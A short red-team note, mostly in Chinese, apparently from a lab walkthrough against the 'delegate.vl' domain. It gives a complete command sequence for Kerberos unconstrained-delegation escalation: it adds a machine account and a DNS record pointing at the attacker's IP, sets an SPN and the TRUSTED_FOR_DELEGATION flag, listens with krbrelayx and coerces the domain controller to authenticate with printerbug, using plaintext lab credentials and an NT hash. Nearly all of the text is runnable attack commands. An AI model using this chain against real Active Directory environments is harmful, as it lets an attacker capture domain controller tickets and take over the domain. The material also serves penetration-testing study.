Domain Escalation: Unconstrained Delegation - Red Teaming
“KUD Unconstrained” 指的是 Kerberos 非约束性委派(Kerberos Unconstrained Delegation)
常用于发现用户有 SeEnableDelegationPrivilege 用户权限
我们需要一个机器帐户,为其配置无约束委派,然后强制域控制器向该机器进行身份验证。这需要能够添加机器帐户以及 DNS 条目(为了进行强制操作 - Kerberos 使用名称而不是 IP 地址)
#新建计算机
impacket-addcomputer delegate.vl/N.Thompson:KALEB_2341 -computer-name hack -computer-pass Admin123 -dc-ip 10.129.234.69
#添加DNS记录
dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69
#加SPN (--additional 可能需要第二次)
addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl
#配置非约束委派
bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341 add uac 'hack$' -f TRUSTED_FOR_DELEGATION
#开启监听
krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
#强制认证
printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d 'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
#查询是否能添加机器
nxc ldap delegate.vl -u N.Thompson -p KALEB_2341 -M maq
#查询DNS解析
nslookup hack.delegate.vl dc1.delegate.vl
#查询是否配置成功
Get-ADComputer hack -Properties TrustedForDelegation | Select-Object Name, TrustedForDelegation
bloodyAD --host dc1.delegate.vl -d delegate.vl -u N.Thompson -p KALEB_2341 get object 'hack$' |grep userAccountControl
#转换哈希
python -c "password = 'Admin123'; import hashlib; print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())"
#强制认证检测
nxc smb dc1.delegate.vl -u 'hack$' -p Admin123 -M coerce_plus